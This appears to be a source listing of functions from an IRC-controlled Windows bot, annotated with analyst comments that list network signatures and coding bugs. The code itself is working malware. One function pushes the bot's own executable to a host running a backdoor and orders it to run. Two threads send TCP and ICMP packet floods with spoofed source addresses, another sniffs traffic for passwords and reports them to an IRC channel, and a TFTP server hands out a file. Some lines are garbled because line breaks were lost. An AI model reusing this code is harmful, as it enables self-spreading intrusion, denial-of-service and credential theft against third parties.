/*
 * IdentThread - thread entry for a minimal ident (TCP port 113) responder.
 *
 * param carries the thread-table index, cast straight to int. The routine
 * binds port 113 on INADDR_ANY, listens with a backlog of 5 and loops on
 * accept() until it fails. For each client it logs the peer address, reads
 * one request, hands it to Split() and answers
 * " : USERID : UNIX : <name from rndnick()>\r\n". An error is logged after
 * the loop only when no reply was ever sent (success still FALSE).
 *
 * Analyst notes, read from the code below:
 *  - The reply has no "<port> , <port>" pair in front of " : USERID". RFC 1413
 *    replies start with that pair, so a reply beginning with " : USERID" is a
 *    usable network signature for this responder.
 *  - The logged port is csin.sin_port as stored; no ntohs() is applied.
 *  - frecv() may fill all of buffer and nothing terminates it before Split().
 *    NOTE(review): Split() is defined elsewhere; confirm what it expects.
 *  - Accepted sockets are not closed inside the loop. csock is closed once
 *    after the loop and is uninitialised when socket/bind/listen or the first
 *    accept failed.
 *  - The f-prefixed calls (fsocket, fbind, ...) are presumably dynamically
 *    resolved Winsock pointers declared elsewhere.
 */
DWORD WINAPI IdentThread(LPVOID param) { char user[12], buffer[IRCLINE]; int threadnum = (int)param; BOOL success = FALSE; SOCKET ssock,csock; SOCKADDR_IN ssin, csin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)113); ssin.sin_addr.s_addr=INADDR_ANY; if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) != INVALID_SOCKET) { threads[threadnum].sock = ssock; if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) { if (flisten(ssock, 5) != SOCKET_ERROR) { int csin_len = sizeof(csin); while (1) { if ((csock = faccept(ssock,(LPSOCKADDR)&csin,&csin_len)) == INVALID_SOCKET) break; sprintf(buffer, "[IDENTD]: Client connection from IP: %s:%d.", finet_ntoa(csin.sin_addr), csin.sin_port); addlog(buffer); if (frecv(csock,buffer,sizeof(buffer),0) != SOCKET_ERROR) { Split(buffer,0); memset(user, 0, sizeof(user)); _snprintf(buffer,sizeof(buffer)," : USERID : UNIX : %s\r\n",rndnick(user, LETTERNICK, FALSE)); if (fsend(csock,buffer,strlen(buffer),0) != SOCKET_ERROR) success = TRUE; } } } } } if (!success) { sprintf(buffer, "[IDENTD]: Error: server failed, returned: <%d>.", fWSAGetLastError()); addlog(buffer); } fclosesocket(ssock); fclosesocket(csock); clearthread(threadnum); ExitThread(0); }
/*
 * NetDevil_Upload - copy the running executable to a remote peer, using an
 * already-connected control socket (ssock) and a second data socket (nsock).
 *
 * Flow as written: send "version" on ssock and read the reply; take a port
 * from the reply when one is found, otherwise use 903; treat the peer as
 * "ver1.5" when the first token matches; connect to IP:port with
 * CreateSock(); open the file named by GetModuleFileName(); announce the
 * transfer ("cmd[003]<path>|<size>|\n\r" for ver1.5, "<path>\r1" otherwise);
 * stream the file in chunks of up to 1024 bytes; send "pleaz_run<path>" on
 * ssock and expect "pleaz_run_done". Returns 1 on success, 0 on failure.
 * The remote path is "C:\" followed by `filename`, which is defined elsewhere.
 *
 * Analyst notes, read from the code below:
 *  - The literals "version", "cmd[003]", "pleaz_run", "pleaz_run_done" and
 *    the fallback TCP port 903 are fixed in the code and can serve as content
 *    signatures for this transfer.
 *  - strrchr(buffer, '\n\r') passes a multi-character constant whose value is
 *    implementation-defined, and strrchr() searches for a single char, so the
 *    port parse is unreliable.
 *  - The last frecv() reads from nsock after fclosesocket(nsock); that call
 *    presumably fails, which makes the function return 0 even after a full
 *    transfer. The end: label then closes nsock a second time.
 *  - testfile is not closed on the goto end paths taken after CreateFile()
 *    succeeded; ReadFile() and the first frecv() results are not checked.
 *  - A reply that fills all 1024 bytes leaves buffer unterminated before
 *    strlen(); `ver` is assigned but never read.
 */
int NetDevil_Upload(char *IP, SOCKET ssock) { SOCKET nsock; char buffer[1024], botfile[MAX_PATH], rFile[MAX_PATH]; int port = 0,bytes_sent = 0; unsigned int Fsend = 1024, Fsize, move; DWORD mode = 0; BOOL ver15 = FALSE; GetModuleFileName(NULL, botfile, sizeof(botfile)); fsend(ssock, "version", 7, 0); memset(buffer,0,sizeof(buffer)); frecv(ssock, buffer, sizeof(buffer), 0); if (strlen(buffer) > 5) { buffer[strlen(buffer)-2] = '\0'; char *uPort = strrchr(buffer, '\n\r'); if (uPort != NULL) port = atoi(uPort); } char *ver = strtok(buffer,"\n\r"); if (strcmp(buffer,"ver1.5") == 0) ver15 = TRUE; sprintf(rFile,"C:\\%s",filename); port = ((port == 0)?(903):(port)); if ((nsock = CreateSock(IP,port)) == INVALID_SOCKET) goto end; HANDLE testfile; if ((testfile = CreateFile(botfile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0)) == INVALID_HANDLE_VALUE) goto end; Fsize = GetFileSize(testfile,NULL); if (ver15) sprintf(buffer,"cmd[003]%s|%i|\n\r",rFile,Fsize); else sprintf(buffer,"%s\r1",rFile); fsend(nsock, buffer, strlen(buffer), 0); if (frecv(nsock, buffer, sizeof(buffer), 0) < 1) goto end; while (Fsize) { memset(buffer,0,sizeof(buffer)); if (Fsend>Fsize) Fsend=Fsize; move = 0-Fsize; SetFilePointer(testfile, move, NULL, FILE_END); ReadFile(testfile, buffer, Fsend, &mode, NULL); bytes_sent = fsend(nsock, buffer, Fsend, 0); if (bytes_sent == SOCKET_ERROR) { if (fWSAGetLastError() != WSAEWOULDBLOCK) goto end; else bytes_sent = 0; } Fsize = Fsize - bytes_sent; if (!ver15 && frecv(nsock, buffer, sizeof(buffer), 0) < 1) goto end; } if (testfile != INVALID_HANDLE_VALUE) CloseHandle(testfile); fclosesocket(nsock); Sleep(2000); sprintf(buffer,"pleaz_run%s",rFile); fsend(ssock, buffer,strlen(buffer), 0); memset(buffer,0,sizeof(buffer)); if (frecv(nsock, buffer, sizeof(buffer), 0) < 1) goto end; if (strcmp(buffer,"pleaz_run_done") != 0) goto end; Sleep(4000); fclosesocket(ssock); return 1; end:; fclosesocket(nsock); fclosesocket(ssock); return 0; }
/*
 * TcpFloodThread - thread entry that emits hand-built TCP packets at one
 * address for tcpflood.time seconds and reports the totals.
 *
 * param points to a TCPFLOOD request; the thread copies it and sets gotinfo
 * on the caller's copy. It opens a raw socket (IPPROTO_RAW) with IP_HDRINCL,
 * rejects an address that finet_addr() cannot parse, then builds an IP and
 * TCP header on every loop pass, computes both checksums through a
 * pseudo-header and calls sendto(). Status and the final summary go to
 * addlog() and, unless silent is set, to the IRC channel via irc_privmsg().
 *
 * Analyst notes, read from the code below:
 *  - Header fields are constant across packets: IP ident 1, TTL 128, TCP
 *    sequence 0x12345678, window 512, source port rand()%1025. That
 *    combination is a practical filter or IDS fingerprint.
 *  - With spoof set the source address is random; networks that enforce
 *    source-address validation on egress (BCP 38) drop such packets.
 *  - When type contains none of "syn", "ack", "random", tcpHeader.flags and
 *    ack_seq are sent uninitialised.
 *  - sendto() is given sizeof(szSendBuf) (60) bytes, while total_len declares
 *    sizeof(ipHeader)+sizeof(tcpHeader); the two may differ.
 *  - The summary divides by tcpflood.time (division by zero when it is 0) and
 *    prints size_t expressions with %d.
 *  - On a send error the socket is closed before fWSAGetLastError() is read,
 *    so the reported code may not be the sendto() error.
 *  - A string literal is split across physical lines in this listing.
 */
DWORD WINAPI TcpFloodThread(LPVOID param) { TCPFLOOD tcpflood = *((TCPFLOOD *)param); TCPFLOOD *tcpfloods = (TCPFLOOD *)param; tcpfloods->gotinfo = TRUE; char sendbuf[IRCLINE], szSendBuf[60]={0}; IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; srand(GetTickCount()); SOCKET ssock; if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) { sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError()); if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } BOOL flag = TRUE; if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) { sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError()); if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } if (finet_addr(tcpflood.ip) == INADDR_NONE) { sprintf(sendbuf,"[TCP]: Invalid target IP."); if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=fhtons(0); ssin.sin_addr.s_addr=finet_addr(tcpflood.ip); int sent = 0; unsigned long start = GetTickCount(); while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) { ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); ipHeader.ident=1; ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_TCP; ipHeader.checksum=0; ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock)))); ipHeader.destIP=ssin.sin_addr.s_addr; ((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned 
short)(rand()%1025))):(tcpHeader.dport=fhtons(tcpflood.port))); tcpHeader.sport=fhtons((unsigned short)(rand()%1025)); tcpHeader.seq=fhtonl(0x12345678); if (strstr(tcpflood.type,"syn")) { tcpHeader.ack_seq=0; tcpHeader.flags=SYN; } else if (strstr(tcpflood.type,"ack")) { tcpHeader.ack_seq=0; tcpHeader.flags=ACK; } else if (strstr(tcpflood.type,"random")) { tcpHeader.ack_seq=rand()%3; ((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK)); } tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); tcpHeader.window=fhtons(512); tcpHeader.urg_ptr=0; tcpHeader.checksum=0; psdHeader.saddr=ipHeader.sourceIP; psdHeader.daddr=ipHeader.destIP; psdHeader.zero=0; psdHeader.proto=IPPROTO_TCP; psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader))); memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) { fclosesocket(ssock); _snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError()); if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } sent++; } fclosesocket(ssock); sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. 
Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024)); if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); }
/*
 * SynPortOpen - half-open probe of one TCP port over a raw socket.
 *
 * Builds a 20-byte TCP header (SYN set, source port 9801, window 512,
 * data offset 5), checksums it through a pseudo-header carrying src_ip and
 * dest_ip, sends it on a SOCK_RAW/IPPROTO_TCP socket and then reads packets
 * until one has tcp.dest equal to src_port. Returns TRUE when that packet
 * has the syn bit set, FALSE otherwise or on any socket error. Results are
 * written with addlog().
 *
 * Analyst notes, read from the code below:
 *  - Source port 9801 and window 512 are fixed, so probes from this routine
 *    share one fingerprint.
 *  - The receive loop has no timeout: with no matching reply recvfrom()
 *    blocks indefinitely. The `delay` parameter is never used.
 *  - recv_tcp.tcp.dest is compared with the host-order value 9801 although
 *    the outgoing source port was stored through fhtons(). NOTE(review):
 *    RECVHEADER is defined elsewhere; confirm the field's byte order.
 *  - The reply is matched on port only; its source address is not compared
 *    with dest_ip.
 *  - sendto() is required to return exactly 20, i.e. sizeof(send_tcp) is
 *    assumed to be 20.
 */
BOOL SynPortOpen(unsigned long src_ip, unsigned long dest_ip, unsigned int port, unsigned int delay) { char buffer[LOGLINE]; int size; unsigned short src_port = 9801; TCPHEADER2 send_tcp; send_tcp.source = fhtons(src_port); send_tcp.dest = fhtons((unsigned short)port); send_tcp.seq = rand(); send_tcp.ack_seq = 0; send_tcp.res1 = 0; send_tcp.res2 = 0; send_tcp.doff = 5; send_tcp.fin = 0; send_tcp.syn = 1; send_tcp.rst = 0; send_tcp.psh = 0; send_tcp.ack = 0; send_tcp.urg = 0; send_tcp.window = fhtons(512); send_tcp.check = 0; send_tcp.urg_ptr = 0; PSDHEADER psdheader; psdheader.saddr = src_ip; psdheader.daddr = dest_ip; psdheader.zero = 0; psdheader.proto = IPPROTO_TCP; psdheader.length = fhtons(sizeof(send_tcp)); memcpy (&psdheader.tcp, &send_tcp, sizeof (send_tcp)); send_tcp.check = checksum((unsigned short *)&psdheader, sizeof (psdheader)); SOCKADDR_IN ssin; memset(&ssin,0,sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)port); ssin.sin_addr.s_addr = dest_ip; int ssin_len = sizeof(ssin); SOCKET tcp_sock = fsocket(AF_INET, SOCK_RAW, IPPROTO_TCP); if (tcp_sock == INVALID_SOCKET) { addlog("socket open failed"); return FALSE; } if ((size = fsendto(tcp_sock,(const char *)&send_tcp,sizeof(send_tcp),0,(LPSOCKADDR)&ssin,ssin_len)) != 20) { sprintf(buffer,"sendto() socket failed. sent = %d <%d>.", size, fWSAGetLastError()); addlog(buffer); fclosesocket(tcp_sock); return FALSE; } RECVHEADER recv_tcp; memset (&recv_tcp,'\0',sizeof(recv_tcp)); while (recv_tcp.tcp.dest != src_port) { if (frecvfrom(tcp_sock,(char *)&recv_tcp,sizeof(recv_tcp),0,(LPSOCKADDR)&ssin, &ssin_len) < 0) { addlog("recvfrom() socket failed"); fclosesocket(tcp_sock); return FALSE; } } fclosesocket(tcp_sock); if (recv_tcp.tcp.syn == 1) { addlog("Socket open."); return TRUE; } else { addlog("Socket closed."); return FALSE; } }
/*
 * SniffThread - thread entry that captures traffic seen by the local
 * interface and reports TCP payloads containing watched strings.
 *
 * param points to a PSNIFF request; the thread copies it and sets gotinfo on
 * the caller's copy. It opens a SOCK_RAW/IPPROTO_IP socket, binds it to the
 * address returned by GetIP(sniff.sock) and enables SIO_RCVALL with mode 1.
 * Each received packet is read into a 65535-byte stack buffer. For protocol 6
 * (TCP) with flags == 24 (PSH|ACK) the payload is searched for every entry of
 * the pswords table; the first hit is formatted with source and destination
 * address/port and sent to addlog(), printf() and, unless silent, the IRC
 * channel. Payloads containing "[PSNIFF]" are skipped, which keeps the
 * thread from reporting its own messages.
 *
 * Analyst notes, read from the code below:
 *  - SIO_RCVALL on a raw socket is the host-side indicator to watch for; any
 *    credential carried in cleartext on the captured interface is exposed to
 *    this kind of capture.
 *  - Payload offset is sizeof(*ip) + sizeof(*tcp): IP options and the TCP
 *    data offset are ignored, so the search can start inside header options.
 *  - The payload is searched with strstr(), so matching stops at the first
 *    zero byte; termination relies on the memset() before each read.
 *  - The return value of frecv() is only compared with SOCKET_ERROR; the
 *    received length is not used to bound parsing.
 *  - pswords and ptype are tables defined elsewhere.
 */
DWORD WINAPI SniffThread(LPVOID param) { char sendbuf[IRCLINE], rawdata[65535], *Packet; int i; DWORD dwRet, dwMode = 1; PSNIFF sniff = *((PSNIFF *)param); PSNIFF *sniffs = (PSNIFF *)param; sniffs->gotinfo = TRUE; IPHEADER *ip; TCPHEADER *tcp; IN_ADDR sia, dia; SOCKET sniffsock; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons(0); ssin.sin_addr.s_addr = finet_addr(GetIP(sniff.sock)); if ((sniffsock = fsocket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) { sprintf(sendbuf, "[PSNIFF]: Error: socket() failed, returned: <%d>.", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); clearthread(sniff.threadnum); ExitThread(0); } threads[sniff.threadnum].sock = sniffsock; if (fbind(sniffsock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) { sprintf(sendbuf, "[PSNIFF]: Error: bind() failed, returned: <%d>.", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); fclosesocket(sniffsock); clearthread(sniff.threadnum); ExitThread(0); } if (fWSAIoctl(sniffsock, SIO_RCVALL, &dwMode, sizeof(dwMode), NULL, 0, &dwRet, NULL, NULL) == SOCKET_ERROR) { sprintf(sendbuf, "[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); fclosesocket(sniffsock); clearthread(sniff.threadnum); ExitThread(0); } while(1) { memset(rawdata, 0, sizeof(rawdata)); Packet = (char *)rawdata; if (frecv(sniffsock, Packet, sizeof(rawdata), 0) == SOCKET_ERROR) { _snprintf(sendbuf,sizeof(sendbuf),"[PSNIFF]: Error: recv() failed, returned: <%d>", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); break; } ip = (IPHEADER *)Packet; if (ip->proto == 6) { Packet += sizeof(*ip); tcp = (TCPHEADER *)Packet; sia.S_un.S_addr = ip->sourceIP; dia.S_un.S_addr = 
ip->destIP; if (tcp->flags == 24) { Packet += sizeof(*tcp); if (strstr(Packet, "[PSNIFF]") == NULL) { for (i=0;i < sizeof(pswords) / sizeof(PSWORDS);i++) { if (strstr(Packet, pswords[i].text)) { _snprintf(sendbuf, sizeof(sendbuf), "[PSNIFF]: Suspicious %s packet from: %s:%d to: %s:%d - %s", ptype[pswords[i].type], finet_ntoa(sia), fntohs(tcp->sport), finet_ntoa(dia), fntohs(tcp->dport), Packet); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice, TRUE); printf("%s\n",sendbuf); addlog(sendbuf); break; } } } } } } fclosesocket(sniffsock); clearthread(sniff.threadnum); ExitThread(0); }
/*
 * ICMPFloodThread - thread entry that emits hand-built ICMP packets at one
 * address for icmpflood.time seconds and reports the totals.
 *
 * param points to an ICMPFLOOD request; the thread copies it and sets gotinfo
 * on the caller's copy. It opens a raw socket (IPPROTO_RAW) with IP_HDRINCL,
 * rejects an address that finet_addr() cannot parse, then fills a static
 * ECHOREQUEST on every loop pass and calls sendto(). Status messages go to
 * the IRC channel unless silent is set; unlike the TCP variant this routine
 * never calls addlog().
 *
 * Analyst notes, read from the code below:
 *  - Both the IP and the ICMP checksum fields are set to 0 and never
 *    computed. ICMP type and subcode are random bytes, IP ident is 1, TTL is
 *    128 and seq is 1. Receiving stacks normally discard ICMP with a bad
 *    checksum, but the packets still consume link capacity; the constant
 *    fields make a practical filter fingerprint.
 *  - With spoof set the source address is random; source-address validation
 *    on egress (BCP 38) drops such packets.
 *  - The summary computes volume from sizeof(szSendBuf) (60) although the
 *    packets sent are sizeof(ECHOREQUEST); szSendBuf is otherwise unused. It
 *    also divides by icmpflood.time (division by zero when it is 0).
 *  - Line breaks were lost in this listing: the text after the `//` marker
 *    swallows the statements that follow it on the same physical line.
 */
DWORD WINAPI ICMPFloodThread(LPVOID param) { ICMPFLOOD icmpflood = *((ICMPFLOOD *)param); ICMPFLOOD *icmpfloods = (ICMPFLOOD *)param; icmpfloods->gotinfo = TRUE; char sendbuf[IRCLINE], szSendBuf[60]={0}; static ECHOREQUEST echo_req; SOCKET ssock; if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) { sprintf(sendbuf,"[ICMP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError()); if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); } BOOL flag = TRUE; if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) { sprintf(sendbuf,"[ICMP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError()); if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); } if (finet_addr(icmpflood.ip) == INADDR_NONE) { sprintf(sendbuf,"[ICMP]: Invalid target IP."); if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=fhtons(0); ssin.sin_addr.s_addr=finet_addr(icmpflood.ip); int sent = 0; unsigned long start = GetTickCount(); while (((GetTickCount() - start) / 1000) <= (unsigned long)icmpflood.time) { echo_req.ipHeader.verlen=(4<<4 | sizeof(IPHEADER)/sizeof(unsigned long)); echo_req.ipHeader.total_len=fhtons(sizeof(ECHOREQUEST)); echo_req.ipHeader.ident=1; echo_req.ipHeader.frag_and_flags=0; echo_req.ipHeader.ttl=128; echo_req.ipHeader.proto=IPPROTO_ICMP; echo_req.ipHeader.checksum=0; echo_req.ipHeader.sourceIP=((icmpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(icmpflood.sock)))); echo_req.ipHeader.destIP=ssin.sin_addr.s_addr; echo_req.icmpHeader.type = rand()%256; echo_req.icmpHeader.subcode = rand()%256; echo_req.icmpHeader.id = (rand() % 240) + 
1; echo_req.icmpHeader.checksum = 0; echo_req.icmpHeader.seq = 1; //fill the packet data with a random character.. memset(echo_req.cData, rand()%255, sizeof(echo_req.cData)); if (fsendto(ssock, (const char *) &echo_req, sizeof(ECHOREQUEST), 0, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN)) == SOCKET_ERROR) { fclosesocket(ssock); _snprintf(sendbuf,sizeof(sendbuf),"[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", icmpflood.ip, sent, fWSAGetLastError()); if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); } sent++; } fclosesocket(ssock); sprintf(sendbuf,"[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", icmpflood.type, icmpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / icmpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024)); if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); }
/*
 * tftpserver - thread entry for a single-file TFTP responder on UDP.
 *
 * param points to a TFTP request; the thread copies it and sets gotinfo on
 * the caller's copy. It binds tftp.port on INADDR_ANY, opens tftp.filename
 * for binary reading and then polls the socket with a 5 s select() timeout.
 * A read request (opcode 0,1) whose name matches tftp.requestname in mode
 * "octet" gets DATA block 1; anything else gets error 1 "File Not Found".
 * An ACK (opcode 0,4) gets the next DATA block, computed from the block
 * number in the ACK. Every other opcode gets error 4 with the text "kthx".
 * When the loop ends the socket and file are closed and, unless gotinfo was
 * cleared, the function calls itself again after 1 s.
 *
 * Analyst notes, read from the code below:
 *  - The error text "kthx" (bytes 6B 74 68 78) and an unexpected TFTP
 *    listener on a workstation are both usable indicators.
 *  - No per-client state is kept: an ACK from any address is answered with
 *    file data for the block it names.
 *  - Restart is done by recursion (after a bind failure and after every
 *    transfer), so stack depth grows for as long as the thread lives; the
 *    bind-failure path also leaves ssock open.
 *  - err holds first the recvfrom() result and then the fread() count; a
 *    final read of 0 bytes is what ends the loop.
 *  - sprintf(IP, finet_ntoa(...)) uses a non-literal format string, and the
 *    "File not found" message is formatted into the 128-byte receive buffer
 *    with an unbounded sprintf() that includes tftp.requestname.
 *  - The mode offset is derived from strlen(tftp.requestname), not from the
 *    received packet; tftp.threads is changed on the local copy only.
 *  - Line breaks were lost in this listing: text after each `//` marker
 *    swallows the statements that follow it on the same physical line.
 */
DWORD WINAPI tftpserver(LPVOID param) { FILE *fp; char sendbuf[IRCLINE], buffer[128], type[]="octet", IP[18]; int err=1; TFTP tftp = *((TFTP *)param); TFTP *tftps = (TFTP *)param; tftps->gotinfo = TRUE; tftp.threads++; SOCKET ssock; if ((ssock=fsocket(AF_INET,SOCK_DGRAM,0)) == INVALID_SOCKET) { Sleep(400); sprintf(sendbuf,"[TFTP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError()); if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice); addlog(sendbuf); clearthread(tftp.threadnum); ExitThread(0); } threads[tftp.threadnum].sock=ssock; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)tftp.port); ssin.sin_addr.s_addr = INADDR_ANY; if((fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) { Sleep(5000); tftp.threads--; return tftpserver(param); } if ((fp=fopen(tftp.filename, "rb")) == NULL) { Sleep(400); sprintf(sendbuf,"[TFTP]: Failed to open file: %s.",tftp.filename); irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice); addlog(sendbuf); clearthread(tftp.threadnum); ExitThread(0); } while(err>0 && tftps->gotinfo && fp) { TIMEVAL timeout; timeout.tv_sec=5; timeout.tv_usec=5000; fd_set fd; FD_ZERO(&fd); FD_SET(ssock,&fd); memset(buffer,0,sizeof(buffer)); if(fselect(0,&fd,NULL,NULL,&timeout) > 0) { SOCKADDR_IN csin; int csin_len=sizeof(csin); char f_buffer[BLOCKSIZE+4]=""; err=frecvfrom(ssock, buffer, sizeof(buffer), 0, (LPSOCKADDR)&csin, &csin_len); sprintf(IP,finet_ntoa(csin.sin_addr)); // parse buffer if(buffer[0]==0 && buffer[1]==1) { //RRQ char *tmprequest=buffer,*tmptype=buffer; tmprequest+=2; //skip the opcode tmptype+=(strlen(tftp.requestname)+3); //skip the opcode and request name + NULL if(strncmp(tftp.requestname,tmprequest,strlen(tftp.requestname)) != 0||strncmp(type,tmptype,strlen(type)) != 0) { fsendto(ssock, "\x00\x05\x00\x01\x46\x69\x6C\x65\x20\x4E\x6F\x74\x20\x46\x6F\x75\x6E\x64\x00", 19, 0, (LPSOCKADDR)&csin,csin_len); // for loop to add a \0 to the 
end of the requestname sprintf(buffer,"[TFTP]: File not found: %s (%s).",IP,tftp.requestname); addlog(buffer); } else { // good rrq packet send first data packet fseek(fp, 0, SEEK_SET); f_buffer[0]=0; f_buffer[1]=3; // DATA f_buffer[2]=0; f_buffer[3]=1; // DATA BLOCK # err=fread(&f_buffer[4], 1, BLOCKSIZE, fp); fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len); sprintf(sendbuf,"[TFTP]: File transfer started to IP: %s (%s).",IP,tftp.filename); if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice); addlog(sendbuf); } } else if(buffer[0]==0 && buffer[1]==4) { // ACK // send next packet unsigned int blocks; BYTE b1=buffer[2],b2=buffer[3]; // ACK BLOCK # f_buffer[0]=0; f_buffer[1]=3; // DATA if (b2==255) { // DATA BLOCK # f_buffer[2]=++b1; f_buffer[3]=b2=0; } else { f_buffer[2]=b1; f_buffer[3]=++b2; } blocks=(b1 * 256) + b2 - 1; // remember to subtract 1 as the ACK block # is 1 more than the actual file block # fseek(fp, blocks * BLOCKSIZE, SEEK_SET); err=fread(&f_buffer[4], 1, BLOCKSIZE, fp); fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len); if (err==0) { sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s (%s).",IP,tftp.filename); if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice); addlog(sendbuf); } } else { // we dont support any other commands fsendto(ssock, "\x00\x05\x00\x04\x6B\x74\x68\x78\x00",9, 0, (LPSOCKADDR)&csin, csin_len); } } else continue; } // check for ack, then msg irc on transfer complete fclosesocket(ssock); fclose(fp); tftp.threads--; if(tftps->gotinfo == FALSE) { clearthread(tftp.threadnum); ExitThread(0); } Sleep(1000); return tftpserver(param); }
/*
